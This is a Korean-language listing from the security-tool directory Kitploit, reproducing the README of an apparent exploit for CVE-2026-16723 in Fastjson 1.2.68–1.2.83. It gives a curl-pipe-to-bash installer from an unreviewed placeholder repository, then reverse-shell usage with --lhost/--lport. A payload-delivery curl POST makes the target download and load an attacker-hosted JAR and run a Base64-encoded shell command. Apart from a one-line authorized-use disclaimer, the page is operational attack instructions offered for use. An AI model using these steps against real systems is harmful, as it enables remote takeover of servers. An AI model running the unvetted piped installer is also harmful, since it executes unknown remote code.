Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-16723 — Fastjson 1.2.68 – 1.2.83 버전에 영향을 미치는 치명적인 취약점. | Kitploit
도구/GitHubGitHub/1xpwn/cve-2026-16723
Payload GenerationExploitationWeb Application ExploitationPenetration Testing
GitHub1xpwn/cve-2026-16723

CVE-2026-16723

Fastjson 1.2.68 – 1.2.83 버전에 영향을 미치는 치명적인 취약점.

저장소 보기
221일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-16723 익스플로잇

CVE-2026-16723, Fastjson 버전 1.2.68 – 1.2.83에 영향을 미치는 치명적인 취약점에 대한 독립형 C++17 구현체입니다.

요구 사항

  • Linux(또는 Windows의 WSL)

  • C++17 호환 컴파일러(GCC 7+ 또는 Clang 5+)

  • CMake 3.10 이상

  • 시스템 패키지:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

설치

빠른 설치(권장)

단일 명령으로 모든 것을 설치합니다:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

또는 설치 프로그램을 수동으로 다운로드하여 실행합니다:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

설치 스크립트는 다음을 수행합니다:

  • 필요한 모든 시스템 패키지를 설치합니다.

  • 필요한 헤더 전용 라이브러리를 다운로드합니다:

    • nlohmann/json
    • cpp-httplib
  • 프로젝트를 빌드합니다.

  • 컴파일된 바이너리를 현재 디렉터리에 다음 이름으로 배치합니다:

root@kitploit:~
./exploit

수동 빌드

저장소를 클론한 경우:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

또는 수동으로 빌드합니다:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

사용법

바이너리를 실행합니다:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

예제

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

실행 후 다음 파일이 생성됩니다:

root@kitploit:~
x
body.json

HTTP 서버는 구성된 포트(기본값: 8000)에서 시작되며, 도구는 들어오는 리버스 셸 연결을 기다립니다.


페이로드 전송

생성된 body.json 파일을 취약한 엔드포인트로 전송합니다:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

애플리케이션이 다른 JSON 필드를 기대하는 경우 --field 옵션을 사용하여 지정합니다.


명령줄 옵션


출력 파일

FileDescription
x생성된 JAR 페이로드
body.json대상에 보낼 JSON 페이로드

참고 사항

  • 이 프로젝트는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다.
  • 이 구현은 대상 애플리케이션이 jar:http 및 jar:file 프로토콜을 사용하여 원격 JAR을 다운로드하고 로드하도록 강제합니다.
  • 리버스 셸 명령은 이스케이프 문제를 줄이기 위해 Base64로 인코딩됩니다.

트위터(X)에서 나를 팔로우하세요

  • MNM
도구 다운로드
OptionDescriptionDefault
--lhost로컬 IP 주소필수
--lport리버스 셸 수신 포트4444
--http-portHTTP 서버 포트8000
--first시도할 첫 번째 파일 디스크립터3
--last시도할 마지막 파일 디스크립터30
--fieldJSON 필드 이름facets
--outdir출력 디렉터리.
-h, --help도움말 메시지 표시—